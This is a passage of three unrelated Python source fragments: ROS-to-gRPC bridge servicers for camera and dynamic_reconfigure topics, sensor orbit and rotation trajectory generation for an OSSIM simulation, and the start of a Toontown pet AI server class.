pb_msg.R.append(ros_msg_)
for ros_msg_ in ros_msg.P:
pb_msg.P.append(ros_msg_)
pb_msg.binning_x = ros_msg.binning_x
pb_msg.binning_y = ros_msg.binning_y
pb_msg.roi.x_offset = ros_msg.roi.x_offset
pb_msg.roi.y_offset = ros_msg.roi.y_offset
pb_msg.roi.height = ros_msg.roi.height
pb_msg.roi.width = ros_msg.roi.width
pb_msg.roi.do_rectify = ros_msg.roi.do_rectify
yield pb_msg
rospy.sleep(0.01)
class usb_cam_image_rawServicer(ros_grpc.usb_cam_image_rawServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('sensor_msgs/Image')
def Publish(self, pb_msg, context):
if self.pub == None:
self.pub = rospy.Publisher('/usb_cam/image_raw', self.Msg, queue_size=10)
ros_msg = self.Msg()
ros_msg.header.seq = pb_msg.header.seq
ros_msg.header.stamp.secs = pb_msg.header.stamp.secs
ros_msg.header.stamp.nsecs = pb_msg.header.stamp.nsecs
ros_msg.header.frame_id = pb_msg.header.frame_id
ros_msg.height = pb_msg.height
ros_msg.width = pb_msg.width
ros_msg.encoding = pb_msg.encoding
ros_msg.is_bigendian = pb_msg.is_bigendian
ros_msg.step = pb_msg.step
ros_msg.data = pb_msg.data
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.sensor_msgs.Image()
pb_msg.header.seq = ros_msg.header.seq
pb_msg.header.stamp.secs = ros_msg.header.stamp.secs
pb_msg.header.stamp.nsecs = ros_msg.header.stamp.nsecs
pb_msg.header.frame_id = ros_msg.header.frame_id
pb_msg.height = ros_msg.height
pb_msg.width = ros_msg.width
pb_msg.encoding = ros_msg.encoding
pb_msg.is_bigendian = ros_msg.is_bigendian
pb_msg.step = ros_msg.step
pb_msg.data = ros_msg.data
yield pb_msg
rospy.sleep(0.01)
class usb_cam_image_raw_compressedServicer(ros_grpc.usb_cam_image_raw_compressedServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('sensor_msgs/CompressedImage')
def Publish(self, pb_msg, context):
if self.pub == None:
self.pub = rospy.Publisher('/usb_cam/image_raw/compressed', self.Msg, queue_size=10)
ros_msg = self.Msg()
ros_msg.header.seq = pb_msg.header.seq
ros_msg.header.stamp.secs = pb_msg.header.stamp.secs
ros_msg.header.stamp.nsecs = pb_msg.header.stamp.nsecs
ros_msg.header.frame_id = pb_msg.header.frame_id
ros_msg.format = pb_msg.format
ros_msg.data = pb_msg.data
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw/compressed', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.sensor_msgs.CompressedImage()
pb_msg.header.seq = ros_msg.header.seq
pb_msg.header.stamp.secs = ros_msg.header.stamp.secs
pb_msg.header.stamp.nsecs = ros_msg.header.stamp.nsecs
pb_msg.header.frame_id = ros_msg.header.frame_id
pb_msg.format = ros_msg.format
pb_msg.data = ros_msg.data
yield pb_msg
rospy.sleep(0.01)
class usb_cam_image_raw_compressed_parameter_descriptionsServicer(ros_grpc.usb_cam_image_raw_compressed_parameter_descriptionsServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('dynamic_reconfigure/ConfigDescription')
def Publish(self, pb_msg, context):
if self.pub == None:
self.pub = rospy.Publisher('/usb_cam/image_raw/compressed/parameter_descriptions', self.Msg, queue_size=10)
ros_msg = self.Msg()
for pb_msg_ in pb_msg.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/Group')()
ros_msg_.name = pb_msg_.name
ros_msg_.type = pb_msg_.type
for pb_msg__ in pb_msg_.parameters:
ros_msg__ = roslib.message.get_message_class('dynamic_reconfigure/ParamDescription')()
ros_msg__.name = pb_msg__.name
ros_msg__.type = pb_msg__.type
ros_msg__.level = pb_msg__.level
ros_msg__.description = pb_msg__.description
ros_msg__.edit_method = pb_msg__.edit_method
ros_msg_.parameters.append(ros_msg__)
ros_msg_.parent = pb_msg_.parent
ros_msg_.id = pb_msg_.id
ros_msg.groups.append(ros_msg_)
for pb_msg_ in pb_msg.max.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.bools.append(ros_msg_)
for pb_msg_ in pb_msg.max.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.ints.append(ros_msg_)
for pb_msg_ in pb_msg.max.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.strs.append(ros_msg_)
for pb_msg_ in pb_msg.max.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.max.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.max.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.max.groups.append(ros_msg_)
for pb_msg_ in pb_msg.min.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.bools.append(ros_msg_)
for pb_msg_ in pb_msg.min.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.ints.append(ros_msg_)
for pb_msg_ in pb_msg.min.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.strs.append(ros_msg_)
for pb_msg_ in pb_msg.min.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.min.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.min.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.min.groups.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.bools.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.ints.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.strs.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.dflt.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.dflt.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.dflt.groups.append(ros_msg_)
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw/compressed/parameter_descriptions', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.dynamic_reconfigure.ConfigDescription()
for ros_msg_ in ros_msg.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.Group()
pb_msg_.name = ros_msg_.name
pb_msg_.type = ros_msg_.type
for ros_msg__ in ros_msg_.parameters:
pb_msg__ = ros_pb.dynamic_reconfigure.ParamDescription()
pb_msg__.name = ros_msg__.name
pb_msg__.type = ros_msg__.type
pb_msg__.level = ros_msg__.level
pb_msg__.description = ros_msg__.description
pb_msg__.edit_method = ros_msg__.edit_method
pb_msg_.parameters.append(pb_msg__)
pb_msg_.parent = ros_msg_.parent
pb_msg_.id = ros_msg_.id
pb_msg.groups.append(pb_msg_)
for ros_msg_ in ros_msg.max.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.bools.append(pb_msg_)
for ros_msg_ in ros_msg.max.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.ints.append(pb_msg_)
for ros_msg_ in ros_msg.max.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.strs.append(pb_msg_)
for ros_msg_ in ros_msg.max.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.max.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.max.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id = ros_msg_.id
pb_msg_.parent = ros_msg_.parent
pb_msg.max.groups.append(pb_msg_)
for ros_msg_ in ros_msg.min.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.bools.append(pb_msg_)
for ros_msg_ in ros_msg.min.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.ints.append(pb_msg_)
for ros_msg_ in ros_msg.min.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.strs.append(pb_msg_)
for ros_msg_ in ros_msg.min.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.min.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.min.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id = ros_msg_.id
pb_msg_.parent = ros_msg_.parent
pb_msg.min.groups.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.bools.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.ints.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.strs.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.dflt.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.dflt.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id = ros_msg_.id
pb_msg_.parent = ros_msg_.parent
pb_msg.dflt.groups.append(pb_msg_)
yield pb_msg
rospy.sleep(0.01)
class usb_cam_image_raw_compressed_parameter_updatesServicer(ros_grpc.usb_cam_image_raw_compressed_parameter_updatesServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('dynamic_reconfigure/Config')
def Publish(self, pb_msg, context):
if self.pub == None:
self.pub = rospy.Publisher('/usb_cam/image_raw/compressed/parameter_updates', self.Msg, queue_size=10)
ros_msg = self.Msg()
for pb_msg_ in pb_msg.bools:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/BoolParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.bools.append(ros_msg_)
for pb_msg_ in pb_msg.ints:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/IntParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.ints.append(ros_msg_)
for pb_msg_ in pb_msg.strs:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/StrParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.strs.append(ros_msg_)
for pb_msg_ in pb_msg.doubles:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/DoubleParameter')()
ros_msg_.name = pb_msg_.name
ros_msg_.value = pb_msg_.value
ros_msg.doubles.append(ros_msg_)
for pb_msg_ in pb_msg.groups:
ros_msg_ = roslib.message.get_message_class('dynamic_reconfigure/GroupState')()
ros_msg_.name = pb_msg_.name
ros_msg_.state = pb_msg_.state
ros_msg_.id = pb_msg_.id
ros_msg_.parent = pb_msg_.parent
ros_msg.groups.append(ros_msg_)
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/image_raw/compressed/parameter_updates', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.dynamic_reconfigure.Config()
for ros_msg_ in ros_msg.bools:
pb_msg_ = ros_pb.dynamic_reconfigure.BoolParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.bools.append(pb_msg_)
for ros_msg_ in ros_msg.ints:
pb_msg_ = ros_pb.dynamic_reconfigure.IntParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.ints.append(pb_msg_)
for ros_msg_ in ros_msg.strs:
pb_msg_ = ros_pb.dynamic_reconfigure.StrParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.strs.append(pb_msg_)
for ros_msg_ in ros_msg.doubles:
pb_msg_ = ros_pb.dynamic_reconfigure.DoubleParameter()
pb_msg_.name = ros_msg_.name
pb_msg_.value = ros_msg_.value
pb_msg.doubles.append(pb_msg_)
for ros_msg_ in ros_msg.groups:
pb_msg_ = ros_pb.dynamic_reconfigure.GroupState()
pb_msg_.name = ros_msg_.name
pb_msg_.state = ros_msg_.state
pb_msg_.id | |
elevation file
Raises:
| No exception is raised.
"""
#obtain odd number of samples around equator 2*pi
if numSamplesAz % 2 == 0:
numSamplesAz += 1
azimuth = np.linspace(0,2 * np.pi, numSamplesAz)
#create twice to many elevation samples, then take every second
elevation2 = np.linspace(np.pi/2., -np.pi/2., numSamplesAz)
elevation = elevation2[::2]
if trajType == 'Rotate':
(x, y, z, roll, pitch, yaw, azel) = \
getRotateFromElevAzim(azimuth, elevation, xTargPos, yTargPos, zTargPos)
elif trajType == 'Orbit':
(x, y, z, roll, pitch, yaw, azel) = \
getOrbitFromElevAzim(azimuth, elevation, xTargPos, yTargPos, zTargPos, distance)
else:
print('Unkown trajectory type')
return
zerov = np.zeros(yaw.shape).reshape(-1, 1)
onesv = np.ones(yaw.shape).reshape(-1, 1)
time = np.array([deltaTime * i for i in range(0,zerov.shape[0])]).reshape(-1, 1)
#time = np.around(time,2) # rounding does not help. internal representation!!
outp = time
outp = np.hstack((outp, x))
outp = np.hstack((outp, y))
outp = np.hstack((outp, z))
outp = np.hstack((outp, roll))
outp = np.hstack((outp, yaw))
outp = np.hstack((outp, pitch))
outp = np.hstack((outp, xVel * onesv)) # x-velocity
outp = np.hstack((outp, yVel * onesv)) # y-velocity
outp = np.hstack((outp, zVel * onesv)) # z-velocity
outp = np.hstack((outp, engine * onesv)) # engine setting
outfile = os.path.basename(filename)
idx=outfile.find('.')
if not idx < 0:
outfile = outfile[:idx]
# fid = open('Trajectory{0}{1}.txt'.format(trajType,outfile), 'w' )
fid = open('Alt{0}Range{1}{2}-{3}-traj.lut'.format(-zTargPos,distance,trajType,outfile), 'w' )
fid.write( 'Time x y z rol yaw pit vx vy vz engine \n' )
fid.write( '0.0 infty infty infty infty infty infty infty infty infty infty \n' )
fid.write( '0.0 infty infty infty infty infty infty infty infty infty infty\n' )
np.savetxt(fid , outp)
fid.close()
fid = open('Alt{0}Range{1}{2}-{3}-Azel.dat'.format(-zTargPos,distance,trajType,outfile), 'w' )
fid.write( 'Azimuth Elevation \n' )
np.savetxt( fid, azel )
print('Set OSSIM clock to {0} increments and max time {1}\n'.\
format(deltaTime, deltaTime * yaw.shape[0]))
##############################################################################
##
def getRotateFromElevAzim(azimuth, elevation, xPos, yPos, zPos):
""" Reads an OFF file and returns object attitude and position.
Calculate the pitch and yaw angles to point the object's X-axis towards
the OFF file vertex directions.
Euler order is yaw-pitch-roll, with roll equal to zero.
Yaw is defined in xy plane.
Pitch is defined in xz plane.
Roll is defined in yz plane.
The object is assumed to stationary at the position (xPos, yPos, zPos),
the position arrays are the same length as the attitude angle arrays,
but all values in each individual array are all the same.
Args:
| azimuth (np.array(N,)): azimuth values
| elevation (np.array(N,)): azimuth values
| xPos (double): object position on x axis
| yPos (double): object position on y axis
| zPos (double): object position on z axis
Returns:
| x(np.array()): array of x object location values
| y(np.array()): array of y object location values
| z(np.array()): array of z object location values
| roll(np.array()): array of object location roll values
| pitch(np.array()): array of object location pitch values
| yaw(np.array()): array of object location yaw values
| azel(np.array()): array of azimuth,elevation values for each sample
Raises:
| No exception is raised.
"""
azimgrid, elevgrid = np.meshgrid(azimuth,elevation)
yaw = azimgrid.reshape(-1,1)
pitch = elevgrid.reshape(-1,1)
roll = np.zeros(yaw.shape).reshape(-1, 1)
onesv = np.ones(yaw.shape).reshape(-1, 1)
x = xPos * onesv
y = yPos * onesv
z = zPos * onesv
azel = azimgrid.reshape(-1, 1)
azel = np.hstack((azel, azimgrid.reshape(-1, 1).reshape(-1, 1)))
return (x, y, z, roll, pitch, yaw, azel)
##############################################################################
##
def getOrbitFromElevAzim(azimuth, elevation, xTargPos, yTargPos, zTargPos, distance):
""" Reads an OFF file and returns sensor attitude and position.
Calculate the sensor attitude and position such that the sensor always
look at the object located at ( xTargPos, yTargPos, zTargPos), at
a constant distance.
Euler order is yaw-pitch-roll, with roll equal to zero.
Yaw is defined in xy plane.
Pitch is defined in xz plane.
Roll is defined in yz plane.
The object is assumed to stationary at the position
(xTargPos, yTargPos, zTargPos).
Args:
| azimuth (np.array(N,)): azimuth values
| elevation (np.array(N,)): azimuth values
| filename (string): OFF file filename
| xTargPos (double): x target object position (fixed)
| yTargPos (double): y target object position (fixed)
| zTargPos (double): z target object position (fixed)
| distance (double): range at which sensor orbits the target
Returns:
| x(np.array()): array of x sensor position values
| y(np.array()): array of y sensor position values
| z(np.array()): array of z sensor position values
| roll(np.array()): array of sensor roll values
| pitch(np.array()): array of sensor pitch values
| yaw(np.array()): array of sensor yaw values
| azel(np.array()): array of azimuth,elevation values for each sample
Raises:
| No exception is raised.
"""
targPosition = np.asarray([xTargPos, yTargPos, zTargPos])
print('target position {}'.format(targPosition))
#get the sensor position from the azimuth and elevation angles
#there must be a better way....
firstTime = True
for elev in elevation:
for azim in azimuth:
x = np.cos(azim) * np.cos(elev)
y = np.sin(azim) * np.cos(elev)
z = - np.sin(elev) # NED coordinate system
vertex = np.asarray([x, y, z])
azelelement = np.asarray([azim, elev])
# print(np.linalg.norm(vertex))
if firstTime:
azel = azelelement
vertices = vertex
firstTime = False
else:
vertices = np.vstack((vertices, vertex))
azel = np.vstack((azel, azelelement))
sensorPos = distance * vertices
sensorPos[:,0] = sensorPos[:,0] + xTargPos
sensorPos[:,1] = sensorPos[:,1] + yTargPos
sensorPos[:,2] = sensorPos[:,2] + zTargPos
ysign = (1 * (sensorPos[:,1] < 0) - 1 * (sensorPos[:,1] >= 0)).reshape(-1, 1)
xyradial = (np.sqrt((targPosition[0]-sensorPos[:,0]) ** 2 + \
(targPosition[1]-sensorPos[:,1]) ** 2)).reshape(-1, 1)
deltaX = (targPosition[0]-sensorPos[:,0]).reshape(-1, 1)
#the strange '+ (xyradial==0)' below is to prevent divide by zero
cosyaw = ((deltaX/(xyradial + (xyradial==0))) * (xyradial!=0) + 0 * (xyradial==0))
yaw = ysign * np.arccos(cosyaw)
pitch = - np.arctan2((targPosition[2]-sensorPos[:,2]).reshape(-1, 1),
xyradial).reshape(-1, 1)
roll = np.zeros(yaw.shape).reshape(-1, 1)
return (sensorPos[:,0].reshape(-1, 1), sensorPos[:,1].reshape(-1, 1), \
sensorPos[:,2].reshape(-1, 1), roll, pitch, yaw, azel)
# #mayavi commented out
# ################################################################
# ##
# def plotSpherical(figure, dataset, vertices, triangles, ptitle='', tsize=0.4, theight=1):
# """Plot the spherical data given a data set, triangle set and vertex set.
# The vertex set defines the direction cosines of the individual samples.
# The triangle set defines how the surfrace must be structured between the samples.
# The data set defines, for each direction cosine, the length of the vector.
# Args:
# | figure(int): mlab figure number
# | dataset(np.array(double)): array of data set values
# | vertices(np.array([])): array of direction cosine vertices as [x y z]
# | triangles(np.array([])): array of triangles as []
# | ptitle(string): title or header for this display
# | tsize(double): title width in in normalised figure width
# | theight(double): title top vertical location in normalised figure height
# Returns:
# | provides an mlab figure.
# Raises:
# | No exception is raised.
# """
# #calculate a (x,y,z) data set from the direction vectors
# x = dataset * vertices[:,0]
# y = dataset * vertices[:,1]
# z = dataset * vertices[:,2]
# mlab.figure(figure, fgcolor=(0, 0, 0), bgcolor=(1, 1, 1))
# # Visualize the points
# pts = mlab.triangular_mesh(x, y, z, triangles )# z, scale_mode='none', scale_factor=0.2)
# mlab.title(ptitle, size=tsize, height=theight)
# #mayavi commented out
# ################################################################
# ##
# def plotOSSIMSpherical(basefigure, nColours, plottitle, datafile, vertexfile, trianglefile):
# """Plot the spherical data given a data set, triangle set and vertex set.
# The vertex set defines the direction cosines of the individual samples.
# The triangle set defines how the surfrace must be structured between the samples.
# The data set defines, for each direction cosine, the length of the vector.
# There is no means to discriminate between negative and pi phase shift.
# In this function we plot colour ratio values initially in absolute form,
# then only positive and then only negative values. In between these two
# shells the values are going through zero.
# Args:
# | basefigure (int): value where figure count must start
# | nColours ([int]): selection of colours to display
# | plottitle (string): plot title or header
# | datafile (string): dataset file filename
# | vertexfile (string): vertex file filename
# | trianglefile (string): triangles file filename
# Returns:
# | provides an mlab figure.
# Raises:
# | No exception is raised.
# """
# vertices = np.genfromtxt(vertexfile, autostrip=True,comments='%')
# triangles = np.genfromtxt(trianglefile, autostrip=True,comments='%')
# radianArray = np.loadtxt(datafile, skiprows=1, dtype = float)
# specBand = ['LWIR', 'MWIR', 'SWIR1', 'SWIR2']
# for i in nColours:
# dataset = radianArray[:,5+i]
# ptitle = '{0} {1}'.format(plottitle,specBand[i])
# plotSpherical(basefigure+10+i, dataset, vertices, | |
from pandac.PandaModules import *
from direct.showbase.PythonUtil import weightedChoice, randFloat, lerp
from direct.showbase.PythonUtil import contains, list2dict, clampScalar
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedSmoothNodeAI
from direct.distributed import DistributedSmoothNodeBase
from direct.distributed import ClockDelta
from direct.fsm import ClassicFSM, State
from direct.interval.IntervalGlobal import *
from toontown.toonbase import ToontownGlobals
from direct.task import Task
from toontown.pets import PetLookerAI
from toontown.pets import PetConstants, PetDNA, PetTraits
from toontown.pets import PetObserve, PetBrain, PetMood
from toontown.pets import PetActionFSM, PetBase, PetGoal, PetTricks
from direct.fsm import FSM
from toontown.toon import DistributedToonAI
from toontown.ai import ServerEventBuffer
import random
import time
import string
import copy
from direct.showbase.PythonUtil import StackTrace
from PetMoverAI import PetMoverAI
class DistributedPetAI(DistributedSmoothNodeAI.DistributedSmoothNodeAI, PetLookerAI.PetLookerAI, PetBase.PetBase):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPetAI')
movieTimeSwitch = {PetConstants.PET_MOVIE_FEED: PetConstants.FEED_TIME,
PetConstants.PET_MOVIE_SCRATCH: PetConstants.SCRATCH_TIME,
PetConstants.PET_MOVIE_CALL: PetConstants.CALL_TIME}
movieDistSwitch = {PetConstants.PET_MOVIE_FEED: PetConstants.FEED_DIST.get,
PetConstants.PET_MOVIE_SCRATCH: PetConstants.SCRATCH_DIST.get}
def __init__(self, air, dna = None):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.__init__(self, air)
PetLookerAI.PetLookerAI.__init__(self)
self.ownerId = 0
self.petName = 'unnamed'
self.traitSeed = 0
self.safeZone = ToontownGlobals.ToontownCentral
self.initialDNA = dna
self.active = 1
self.activated = 0
self._outOfBounds = False
self.traitList = [0] * PetTraits.PetTraits.NumTraits
self.head = -1
self.ears = -1
self.nose = -1
self.tail = -1
self.bodyTexture = 0
self.color = 0
self.colorScale = 0
self.eyeColor = 0
self.gender = 0
self.movieMode = None
self.lockMoverEnabled = 0
self.trickAptitudes = []
self.inEstate = 0
self.estateOwnerId = None
self.estateZones = []
self.lastSeenTimestamp = self.getCurEpochTimestamp()
self.requiredMoodComponents = {}
self.__funcsToDelete = []
self.__generateDistTraitFuncs()
self.__generateDistMoodFuncs()
self.busy = 0
self.gaitFSM = ClassicFSM.ClassicFSM('petGaitFSM', [State.State('off', self.gaitEnterOff, self.gaitExitOff),
State.State('neutral', self.gaitEnterNeutral, self.gaitExitNeutral),
State.State('happy', self.gaitEnterHappy, self.gaitExitHappy),
State.State('sad', self.gaitEnterSad, self.gaitExitSad)], 'off', 'off')
self.gaitFSM.enterInitialState()
self.unstickFSM = ClassicFSM.ClassicFSM('unstickFSM', [State.State('off', self.unstickEnterOff, self.unstickExitOff), State.State('on', self.unstickEnterOn, self.unstickExitOn)], 'off', 'off')
self.unstickFSM.enterInitialState()
if __dev__:
self.pscMoveResc = PStatCollector('App:Show code:petMove:Reschedule')
return
def setInactive(self):
self.active = 0
def _initDBVals(self, ownerId, name = None, traitSeed = 0, dna = None, safeZone = ToontownGlobals.ToontownCentral):
self.b_setOwnerId(ownerId)
if name is None:
name = 'pet%s' % self.doId
self.b_setPetName(name)
self.b_setTraitSeed(traitSeed)
self.b_setSafeZone(safeZone)
traits = PetTraits.PetTraits(traitSeed, safeZone)
for traitName in PetTraits.getTraitNames():
setter = self.getSetterName(traitName, 'b_set')
self.__dict__[setter](traits.getTraitValue(traitName))
self.traits = traits
for component in PetMood.PetMood.Components:
setterName = self.getSetterName(component, 'b_set')
self.__dict__[setterName](0.0)
if not dna:
dna = PetDNA.getRandomPetDNA()
self.setDNA(dna)
self.b_setLastSeenTimestamp(self.getCurEpochTimestamp())
for component in PetMood.PetMood.Components:
self.setMoodComponent(component, 0.0)
self.b_setTrickAptitudes([])
return
def setDNA(self, dna):
head, ears, nose, tail, body, color, colorScale, eyes, gender = dna
self.b_setHead(head)
self.b_setEars(ears)
self.b_setNose(nose)
self.b_setTail(tail)
self.b_setBodyTexture(body)
self.b_setColor(color)
self.b_setColorScale(colorScale)
self.b_setEyeColor(eyes)
self.b_setGender(gender)
def handleZoneChange(self, newZoneId, oldZoneId):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.handleZoneChange(self, newZoneId, oldZoneId)
self.ignore(PetObserve.getEventName(oldZoneId))
self.accept(PetObserve.getEventName(newZoneId), self.brain.observe)
def handleLogicalZoneChange(self, newZoneId, oldZoneId):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.handleLogicalZoneChange(self, newZoneId, oldZoneId)
self.announceZoneChange(newZoneId, oldZoneId)
def announceZoneChange(self, newZoneId, oldZoneId):
DistributedPetAI.notify.debug('%s.announceZoneChange: %s->%s' % (self.doId, oldZoneId, newZoneId))
